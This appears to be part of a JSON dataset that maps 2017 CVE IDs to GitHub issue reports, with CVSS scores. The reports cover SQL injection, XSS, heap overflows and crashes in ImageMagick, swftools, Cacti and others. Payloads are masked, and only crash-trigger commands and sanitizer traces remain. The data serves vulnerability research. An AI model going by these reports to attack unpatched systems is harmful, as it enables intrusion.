  5487. },
  5488. {
  5489. "CVE_ID": "CVE-2017-10679",
  5490. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/723",
  5491. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/723",
  5492. "Repo_new": "piwigo/piwigo",
  5493. "Issue_Created_At": "2017-06-28T21:54:00Z",
  5494. "description": "when requesting an private id, the permalink is reealed. see URLTAG",
  5495. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  5496. "severity": "HIGH",
  5497. "baseScore": 7.5,
  5498. "impactScore": 3.6,
  5499. "exploitabilityScore": 3.9
  5500. },
  5501. {
  5502. "CVE_ID": "CVE-2017-10682",
  5503. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/724",
  5504. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/724",
  5505. "Repo_new": "piwigo/piwigo",
  5506. "Issue_Created_At": "2017-06-29T05:19:56Z",
  5507. "description": "Bug Report: SQL injection in page cat_options. Proof of Concent APITAG section status CODETAG FILETAG FILETAG section commnets CODETAG FILETAG",
  5508. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5509. "severity": "CRITICAL",
  5510. "baseScore": 9.8,
  5511. "impactScore": 5.9,
  5512. "exploitabilityScore": 3.9
  5513. },
  5514. {
  5515. "CVE_ID": "CVE-2017-10788",
  5516. "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/120",
  5517. "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/120",
  5518. "Repo_new": "perl5-dbi/dbd-mysql",
  5519. "Issue_Created_At": "2017-04-13T16:44:13Z",
  5520. "description": "DBD::mysql::st DESTROY failed on APITAG Some tests from DBD::mysql fail on APITAG with different perl versions NUMBERTAG and NUMBERTAG Here there are two different reports: URLTAG URLTAG Both failed with the same errors: CODETAG And this \"beta\" character goes on in very long lines. It is important to note that APITAG is not indeed available on APITAG by default, but APITAG is installed instead: CODETAG I also have reports from this same CPAN Smoker with PASS and UNKNOWN results, but in both cases the tests were skipped.",
  5521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5522. "severity": "CRITICAL",
  5523. "baseScore": 9.8,
  5524. "impactScore": 5.9,
  5525. "exploitabilityScore": 3.9
  5526. },
  5527. {
  5528. "CVE_ID": "CVE-2017-10789",
  5529. "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/110",
  5530. "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/110",
  5531. "Repo_new": "perl5-dbi/dbd-mysql",
  5532. "Issue_Created_At": "2017-03-23T11:54:02Z",
  5533. "description": "Handle SSL/TLS correctly. Currently DBD::mysql has these SSL/TLS connections parameters: APITAG After discussion in URLTAG and URLTAG I'm proposing following change how DBD::mysql should process SSL/TLS settings NUMBERTAG Parameter APITAG would change its meaning and after this change SSL/TLS will be required and enforced. If server does not support it then client must not connect to APITAG server and must reject connection NUMBERTAG Introduce new APITAG parameter (default false; SSL/TLS is required and enforced) which could allow to connect to APITAG server without SSL/TLS support when APITAG . This is dangerous as BACKRONYM ( URLTAG or Riddle ( URLTAG can take effect, but in some cases it could be useful (e.g. when it can be ensured that it is not possible to modify any packet between client and server, just there can be passive monitoring of network). Documentation for APITAG must describe this problem and suggest users to not enable this option if they are unsure NUMBERTAG When specified APITAG or APITAG then DBD::mysql must check and verify CA certificate. If validation fails then connection must be rejected NUMBERTAG If DBD::mysql (or underlaying libmysqlclient.so library) decide to reject connection with APITAG server then data (login credentials, authentication negotiation or SQL statements) must not be sent to APITAG server NUMBERTAG If underlaying libmysqlclient.so library is not able to enforce current configuration specified by APITAG parameters then it must reject connection NUMBERTAG If it is possible try to support different versions of libmysqlclient.so library APITAG APITAG NUMBERTAG If not, rather drop SSL support for particular libmysqlclient.so version as providing PATHTAG SSL encryption. CC: MENTIONTAG MENTIONTAG MENTIONTAG Please review my changes and if something is missing or incorrect let me know.",
  5534. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  5535. "severity": "MEDIUM",
  5536. "baseScore": 5.9,
  5537. "impactScore": 3.6,
  5538. "exploitabilityScore": 2.2
  5539. },
  5540. {
  5541. "CVE_ID": "CVE-2017-10789",
  5542. "Issue_Url_old": "https://github.com/perl5-dbi/DBD-mysql/issues/140",
  5543. "Issue_Url_new": "https://github.com/perl5-dbi/dbd-mysql/issues/140",
  5544. "Repo_new": "perl5-dbi/dbd-mysql",
  5545. "Issue_Created_At": "2017-07-01T18:14:10Z",
  5546. "description": "CVETAG : mysql_ssl NUMBERTAG does not enforce encryption. DBD::mysql connects to APITAG server without SSL encryption even when APITAG is set together with APITAG certificate. Test case: CODETAG Related to URLTAG",
  5547. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  5548. "severity": "MEDIUM",
  5549. "baseScore": 5.9,
  5550. "impactScore": 3.6,
  5551. "exploitabilityScore": 2.2
  5552. },
  5553. {
  5554. "CVE_ID": "CVE-2017-10795",
  5555. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/467",
  5556. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/467",
  5557. "Repo_new": "intelliants/subrion",
  5558. "Issue_Created_At": "2017-06-07T03:31:38Z",
  5559. "description": "Stored Cross site Scripting in PATHTAG Hi, I found a stored cross site scripting vulnerability in PATHTAG . And i also tested it on new develop version , it is vulnerable too. The POC is show below. Version : develop version 'commit bc6ed NUMBERTAG URLTAG FILETAG When the other user access the blog ,the script code will be excuted FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
  5560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5561. "severity": "MEDIUM",
  5562. "baseScore": 6.1,
  5563. "impactScore": 2.7,
  5564. "exploitabilityScore": 2.8
  5565. },
  5566. {
  5567. "CVE_ID": "CVE-2017-10803",
  5568. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17898",
  5569. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17898",
  5570. "Repo_new": "odoo/odoo",
  5571. "Issue_Created_At": "2017-06-28T21:57:57Z",
  5572. "description": "reserved .",
  5573. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  5574. "severity": "MEDIUM",
  5575. "baseScore": 6.5,
  5576. "impactScore": 5.9,
  5577. "exploitabilityScore": 0.6
  5578. },
  5579. {
  5580. "CVE_ID": "CVE-2017-10804",
  5581. "Issue_Url_old": "https://github.com/psycopg/psycopg2/issues/420",
  5582. "Issue_Url_new": "https://github.com/psycopg/psycopg2/issues/420",
  5583. "Repo_new": "psycopg/psycopg2",
  5584. "Issue_Created_At": "2016-03-30T19:36:22Z",
  5585. "description": "Strings with NUL bytes are silently truncated in bound parameters. Minimal repro: CODETAG This prints out APITAG , which is neither what I tried to insert nor what I tried to query for, which came as a surprise to me! I would have expected some kind of exception to be thrown. This has the potential to cause security flaws if a developer assumes that the string being queried/inserted has passed validation because the query worked.",
  5586. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5587. "severity": "CRITICAL",
  5588. "baseScore": 9.8,
  5589. "impactScore": 5.9,
  5590. "exploitabilityScore": 3.9
  5591. },
  5592. {
  5593. "CVE_ID": "CVE-2017-10804",
  5594. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17914",
  5595. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17914",
  5596. "Repo_new": "odoo/odoo",
  5597. "Issue_Created_At": "2017-06-29T11:56:01Z",
  5598. "description": "reserved .",
  5599. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5600. "severity": "CRITICAL",
  5601. "baseScore": 9.8,
  5602. "impactScore": 5.9,
  5603. "exploitabilityScore": 3.9
  5604. },
  5605. {
  5606. "CVE_ID": "CVE-2017-10805",
  5607. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17921",
  5608. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17921",
  5609. "Repo_new": "odoo/odoo",
  5610. "Issue_Created_At": "2017-06-29T15:21:47Z",
  5611. "description": "reserved .",
  5612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5613. "severity": "HIGH",
  5614. "baseScore": 8.8,
  5615. "impactScore": 5.9,
  5616. "exploitabilityScore": 2.8
  5617. },
  5618. {
  5619. "CVE_ID": "CVE-2017-10869",
  5620. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1460",
  5621. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1460",
  5622. "Repo_new": "h2o/h2o",
  5623. "Issue_Created_At": "2017-10-18T06:17:40Z",
  5624. "description": "test.",
  5625. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5626. "severity": "HIGH",
  5627. "baseScore": 7.5,
  5628. "impactScore": 3.6,
  5629. "exploitabilityScore": 3.9
  5630. },
  5631. {
  5632. "CVE_ID": "CVE-2017-10872",
  5633. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1543",
  5634. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1543",
  5635. "Repo_new": "h2o/h2o",
  5636. "Issue_Created_At": "2017-12-14T07:08:11Z",
  5637. "description": "test.",
  5638. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  5639. "severity": "MEDIUM",
  5640. "baseScore": 6.5,
  5641. "impactScore": 3.6,
  5642. "exploitabilityScore": 2.8
  5643. },
  5644. {
  5645. "CVE_ID": "CVE-2017-10908",
  5646. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1544",
  5647. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1544",
  5648. "Repo_new": "h2o/h2o",
  5649. "Issue_Created_At": "2017-12-14T07:13:53Z",
  5650. "description": "test.",
  5651. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5652. "severity": "HIGH",
  5653. "baseScore": 7.5,
  5654. "impactScore": 3.6,
  5655. "exploitabilityScore": 3.9
  5656. },
  5657. {
  5658. "CVE_ID": "CVE-2017-10928",
  5659. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/539",
  5660. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/539",
  5661. "Repo_new": "imagemagick/imagemagick",
  5662. "Issue_Created_At": "2017-07-04T16:34:09Z",
  5663. "description": "Heap buffer overflow of identify&convert. APITAG NUMBERTAG APITAG APITAG APITAG build instructions: APITAG when identify or convert MNG file, imagemagick will cause a heap buffer overflow > APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG df0 at pc NUMBERTAG f NUMBERTAG bfe NUMBERTAG a7 bp NUMBERTAG ffdd3a NUMBERTAG b NUMBERTAG sp NUMBERTAG ffdd3a NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG df0 thread T NUMBERTAG f NUMBERTAG bfe NUMBERTAG a6 in APITAG APITAG NUMBERTAG f NUMBERTAG c1a NUMBERTAG e in APITAG APITAG NUMBERTAG f NUMBERTAG c1a NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG efdcd0 in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG f0e NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f0f NUMBERTAG a in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG c1acb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG c4f in APITAG APITAG NUMBERTAG f NUMBERTAG bfdde NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG bd NUMBERTAG a9 in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG a2a in APITAG APITAG NUMBERTAG f NUMBERTAG b7a8c7a in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG be in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) The vulnerability is caused when identify MNG image, which happens in function APITAG APITAG function APITAG is called by APITAG APITAG Here is the critical code of mng_get_long and its call code: ERRORTAG The reason of this heap buffer overflow is when p buffer has no matched \u2018(\u2018 \u2018)\u2019characters, the POC\u2019s buffer p here is \u201c\"trix( APITAG caused the heap buffer overflow read until next NUMBERTAG matched. It is possible to disclosing some critical data, such as heap chunk data and even other applications\u2019 private data. I am not sure whether it can be exploited to achieve code execution, maybe it is possible. Testcase: URLTAG",
  5664. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5665. "severity": "HIGH",
  5666. "baseScore": 8.8,
  5667. "impactScore": 5.9,
  5668. "exploitabilityScore": 2.8
  5669. },
  5670. {
  5671. "CVE_ID": "CVE-2017-10929",
  5672. "Issue_Url_old": "https://github.com/radare/radare2/issues/7855",
  5673. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7855",
  5674. "Repo_new": "radareorg/radare2",
  5675. "Issue_Created_At": "2017-07-03T18:50:01Z",
  5676. "description": "Heap buffer overflow in APITAG Heap buffer overflow in APITAG Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  5677. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5678. "severity": "HIGH",
  5679. "baseScore": 7.8,
  5680. "impactScore": 5.9,
  5681. "exploitabilityScore": 1.8
  5682. },
  5683. {
  5684. "CVE_ID": "CVE-2017-10970",
  5685. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/838",
  5686. "Issue_Url_new": "https://github.com/cacti/cacti/issues/838",
  5687. "Repo_new": "cacti/cacti",
  5688. "Issue_Created_At": "2017-07-05T09:05:12Z",
  5689. "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote anonymous users to inject arbitrary web script or HTML via the id parameter. eg: APITAG FILETAG",
  5690. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
  5691. "severity": "MEDIUM",
  5692. "baseScore": 5.4,
  5693. "impactScore": 2.5,
  5694. "exploitabilityScore": 2.8
  5695. },
  5696. {
  5697. "CVE_ID": "CVE-2017-10976",
  5698. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/28",
  5699. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/28",
  5700. "Repo_new": "matthiaskramm/swftools",
  5701. "Issue_Created_At": "2017-06-11T14:12:37Z",
  5702. "description": "ttftool APITAG memcpy overflow. Crash : URLTAG url Trigger : ./ttftool swftools/ttf2swf_crash_memcpy Crash Detail : ERRORTAG",
  5703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5704. "severity": "HIGH",
  5705. "baseScore": 7.5,
  5706. "impactScore": 3.6,
  5707. "exploitabilityScore": 3.9
  5708. },
  5709. {
  5710. "CVE_ID": "CVE-2017-10995",
  5711. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/538",
  5712. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/538",
  5713. "Repo_new": "imagemagick/imagemagick",
  5714. "Issue_Created_At": "2017-07-04T16:32:12Z",
  5715. "description": "imagemagick identify&convert heap buffer overflow . APITAG NUMBERTAG APITAG build instructions: APITAG when identify or convert MNG file, imagemagick will cause a heap buffer overflow > APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c5a at pc NUMBERTAG fee NUMBERTAG dfb7d bp NUMBERTAG ffeba NUMBERTAG b0 sp NUMBERTAG ffeba NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG c5a thread T NUMBERTAG fee NUMBERTAG dfb7c in mng_get_long APITAG NUMBERTAG fee NUMBERTAG f NUMBERTAG ad in APITAG APITAG NUMBERTAG fee NUMBERTAG fae NUMBERTAG in APITAG APITAG NUMBERTAG fee NUMBERTAG c4f in APITAG APITAG NUMBERTAG fee NUMBERTAG bee NUMBERTAG in APITAG APITAG NUMBERTAG fee NUMBERTAG c in APITAG APITAG NUMBERTAG fee NUMBERTAG a9 in APITAG APITAG NUMBERTAG fee NUMBERTAG c NUMBERTAG a2a in APITAG APITAG NUMBERTAG fee NUMBERTAG c NUMBERTAG c7a in APITAG APITAG NUMBERTAG a in APITAG APITAG NUMBERTAG be in main APITAG NUMBERTAG fee NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) The vulnerability is caused when identify MNG image, which happens in function mng_get_long APITAG which is called by line NUMBERTAG at coders/png.c. Here is the critical code of mng_get_long and its call code: ERRORTAG CODETAG It is caused by heap buffer overflow, which is caused by a read operation without overflow check. The p buffer is pointer to chunk, its buffer data and length are read from input file, ERRORTAG When setting proper length and repeat value, it is possible to disclosing some critical data, such as heap chunk data and even other applications\u2019 private data. Testcase: URLTAG",
  5716. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5717. "severity": "MEDIUM",
  5718. "baseScore": 5.5,
  5719. "impactScore": 3.6,
  5720. "exploitabilityScore": 1.8
  5721. },
  5722. {
  5723. "CVE_ID": "CVE-2017-11096",
  5724. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/25",
  5725. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/25",
  5726. "Repo_new": "matthiaskramm/swftools",
  5727. "Issue_Created_At": "2017-06-11T14:06:28Z",
  5728. "description": "swfcombine APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfcombine t m G B v z f o /dev/null swftools/swfcombine_ t m G B v z f APITAG Crash Detail : ERRORTAG",
  5729. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5730. "severity": "HIGH",
  5731. "baseScore": 8.8,
  5732. "impactScore": 5.9,
  5733. "exploitabilityScore": 2.8
  5734. },
  5735. {
  5736. "CVE_ID": "CVE-2017-11097",
  5737. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/24",
  5738. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/24",
  5739. "Repo_new": "matthiaskramm/swftools",
  5740. "Issue_Created_At": "2017-06-11T14:03:58Z",
  5741. "description": "swfc APITAG Null pointer access . Crash : URLTAG url Trigger : ./swfc APITAG Crash Detail : ERRORTAG",
  5742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5743. "severity": "HIGH",
  5744. "baseScore": 8.8,
  5745. "impactScore": 5.9,
  5746. "exploitabilityScore": 2.8
  5747. },
  5748. {
  5749. "CVE_ID": "CVE-2017-11098",
  5750. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/32",
  5751. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/32",
  5752. "Repo_new": "matthiaskramm/swftools",
  5753. "Issue_Created_At": "2017-06-11T14:21:21Z",
  5754. "description": "png2swf APITAG access except. Crash : URLTAG url Trigger : ./png2swf r z j NUMBERTAG s NUMBERTAG o /dev/null swftools/png2swf_ r_ z_ j NUMBERTAG s NUMBERTAG APITAG Crash Detail : PATHTAG ./png2swf r z j NUMBERTAG s NUMBERTAG o /dev/null swftools/png2swf_ r_ z_ j NUMBERTAG s NUMBERTAG APITAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG fb5e1f NUMBERTAG pc NUMBERTAG a8a bp NUMBERTAG fffffff0 sp NUMBERTAG ffe7e1c NUMBERTAG e0 T NUMBERTAG a NUMBERTAG in png_load ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG in main ( PATHTAG ERRORTAG NUMBERTAG fb5e4dfb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG png_load NUMBERTAG ABORTING",
  5755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5756. "severity": "HIGH",
  5757. "baseScore": 8.8,
  5758. "impactScore": 5.9,
  5759. "exploitabilityScore": 2.8
  5760. },
  5761. {
  5762. "CVE_ID": "CVE-2017-11099",
  5763. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/31",
  5764. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/31",
  5765. "Repo_new": "matthiaskramm/swftools",
  5766. "Issue_Created_At": "2017-06-11T14:19:07Z",
  5767. "description": "wa NUMBERTAG swf APITAG access except . Crash : URLTAG url Trigger : ./wa NUMBERTAG swf APITAG Crash Detail : PATHTAG ./wa NUMBERTAG swf APITAG ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG ffe0eb NUMBERTAG sp NUMBERTAG ffe0eb NUMBERTAG f NUMBERTAG T NUMBERTAG in wav_convert2mono ( PATHTAG NUMBERTAG a in main ( PATHTAG NUMBERTAG fccd NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG wav_convert2mono NUMBERTAG ABORTING",
  5768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5769. "severity": "HIGH",
  5770. "baseScore": 8.8,
  5771. "impactScore": 5.9,
  5772. "exploitabilityScore": 2.8
  5773. },
  5774. {
  5775. "CVE_ID": "CVE-2017-11100",
  5776. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/27",
  5777. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/27",
  5778. "Repo_new": "matthiaskramm/swftools",
  5779. "Issue_Created_At": "2017-06-11T14:09:51Z",
  5780. "description": "swfextract APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfextract APITAG Crash Detail : ERRORTAG",
  5781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5782. "severity": "HIGH",
  5783. "baseScore": 8.8,
  5784. "impactScore": 5.9,
  5785. "exploitabilityScore": 2.8
  5786. },
  5787. {
  5788. "CVE_ID": "CVE-2017-11101",
  5789. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/26",
  5790. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/26",
  5791. "Repo_new": "matthiaskramm/swftools",
  5792. "Issue_Created_At": "2017-06-11T14:07:57Z",
  5793. "description": "swfcombine APITAG Null pointer access. Crash : URLTAG url Trigger : ./swfcombine t m G B v z f o /dev/null swftools/swfcombine_ t m G B v z f APITAG Crash Detail : ERRORTAG",
  5794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5795. "severity": "HIGH",
  5796. "baseScore": 8.8,
  5797. "impactScore": 5.9,
  5798. "exploitabilityScore": 2.8
  5799. },
  5800. {
  5801. "CVE_ID": "CVE-2017-11107",
  5802. "Issue_Url_old": "https://github.com/leenooks/phpLDAPadmin/issues/50",
  5803. "Issue_Url_new": "https://github.com/leenooks/phpldapadmin/issues/50",
  5804. "Repo_new": "leenooks/phpldapadmin",
  5805. "Issue_Created_At": "2017-07-08T02:02:33Z",
  5806. "description": "XSS in FILETAG . Hello, Ismail Belkacim reported CVETAG to Ubuntu's bug tracker. He also provided a patch, URLTAG is this an already known issue? Do you know if CVE has already been assigned to this issue? I didn't see fixes like his in the git tree here. Thanks The important part of the patch: ERRORTAG",
  5807. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5808. "severity": "MEDIUM",
  5809. "baseScore": 6.1,
  5810. "impactScore": 2.7,
  5811. "exploitabilityScore": 2.8
  5812. },
  5813. {
  5814. "CVE_ID": "CVE-2017-11141",
  5815. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/469",
  5816. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/469",
  5817. "Repo_new": "imagemagick/imagemagick",
  5818. "Issue_Created_At": "2017-05-04T03:33:33Z",
  5819. "description": "memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identify MAT file, imagemagick will allocate memory to store data in function APITAG in coders\\mat.c, line NUMBERTAG PATHTAG APITAG PATHTAG APITAG will call function APITAG in APITAG line NUMBERTAG PATHTAG APITAG >depth); PATHTAG APITAG will call function APITAG in APITAG line NUMBERTAG PATHTAG APITAG { ... APITAG >columns,image >rows) quantum; // line NUMBERTAG can be controlled ... APITAG //line NUMBERTAG PATHTAG image >columns and image >rows can be controlled, as it is assigned in APITAG NUMBERTAG PATHTAG image >columns = APITAG // can be controlled image >rows = APITAG // can be controlled PATHTAG MATLAB_HDR are diretly from MAT file without checking in APITAG NUMBERTAG PATHTAG if APITAG char ) APITAG NUMBERTAG can be controlled by modify MAT file PATHTAG So, modifying the width and height can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
  5820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5821. "severity": "MEDIUM",
  5822. "baseScore": 6.5,
  5823. "impactScore": 3.6,
  5824. "exploitabilityScore": 2.8
  5825. },
  5826. {
  5827. "CVE_ID": "CVE-2017-11163",
  5828. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/847",
  5829. "Issue_Url_new": "https://github.com/cacti/cacti/issues/847",
  5830. "Repo_new": "cacti/cacti",
  5831. "Issue_Created_At": "2017-07-10T06:45:04Z",
  5832. "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG iaotian. EMAILTAG .cn APITAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers. APITAG APITAG APITAG",
  5833. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5834. "severity": "MEDIUM",
  5835. "baseScore": 5.4,
  5836. "impactScore": 2.7,
  5837. "exploitabilityScore": 2.3
  5838. },
  5839. {
  5840. "CVE_ID": "CVE-2017-11166",
  5841. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/471",
  5842. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/471",
  5843. "Repo_new": "imagemagick/imagemagick",
  5844. "Issue_Created_At": "2017-05-04T03:37:12Z",
  5845. "description": "submitted memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identify XWD file, imagemagick will allocate memory to store pixel in function APITAG in coders\\xwd.c, line NUMBERTAG PATHTAG APITAG ) APITAG colors)); // can be controlled PATHTAG length can be controlled, as it is assigned as follow(line NUMBERTAG PATHTAG length=(size_t) APITAG PATHTAG APITAG are diretly from XWD file without checking( line NUMBERTAG PATHTAG APITAG char ) &header); // can be controlled by modify XWD file PATHTAG header is a instance of struct _xwd_file_header as follow: PATHTAG typedef struct _xwd_file_header { / header_size = APITAG + length of null terminated window name. / CARD NUMBERTAG header_size B NUMBERTAG CARD NUMBERTAG file_version B NUMBERTAG WD_FILE_VERSION above / CARD NUMBERTAG pixmap_format B NUMBERTAG APITAG or APITAG / CARD NUMBERTAG pixmap_depth B NUMBERTAG Pixmap depth / CARD NUMBERTAG pixmap_width B NUMBERTAG Pixmap width / CARD NUMBERTAG pixmap_height B NUMBERTAG Pixmap height / CARD NUMBERTAG offset B NUMBERTAG Bitmap x offset, normally NUMBERTAG CARD NUMBERTAG byte_order B NUMBERTAG of image data: APITAG APITAG / / bitmap_unit applies to bitmaps (depth NUMBERTAG format XY) only. It is the number of bits that each scanline is padded to. / CARD NUMBERTAG bitmap_unit B NUMBERTAG CARD NUMBERTAG bitmap_bit_order B NUMBERTAG bitmaps only: APITAG APITAG / / bitmap_pad applies to pixmaps (non bitmaps) only. It is the number of bits that each scanline is padded to. / CARD NUMBERTAG bitmap_pad B NUMBERTAG CARD NUMBERTAG bits_per_pixel B NUMBERTAG Bits per pixel / / bytes_per_line is pixmap_width padded to bitmap_unit (bitmaps) or bitmap_pad (pixmaps). It is the delta (in bytes) to get to the same x position on an adjacent row. / CARD NUMBERTAG bytes_per_line B NUMBERTAG CARD NUMBERTAG isual_class B NUMBERTAG Class of colormap / CARD NUMBERTAG red_mask B NUMBERTAG Z red mask / CARD NUMBERTAG green_mask B NUMBERTAG Z green mask / CARD NUMBERTAG blue_mask B NUMBERTAG Z blue mask / CARD NUMBERTAG bits_per_rgb B NUMBERTAG Log2 of distinct color values / CARD NUMBERTAG colormap_entries B NUMBERTAG Number of entries in colormap; not used? / CARD NUMBERTAG ncolors B NUMBERTAG Number of APITAG structures / CARD NUMBERTAG window_width B NUMBERTAG Window width / CARD NUMBERTAG window_height B NUMBERTAG Window height / CARD NUMBERTAG window_x B NUMBERTAG Window upper left X coordinate / CARD NUMBERTAG window_y B NUMBERTAG Window upper left Y coordinate / CARD NUMBERTAG window_bdrwidth B NUMBERTAG Window border width / } APITAG PATHTAG So, modifying the 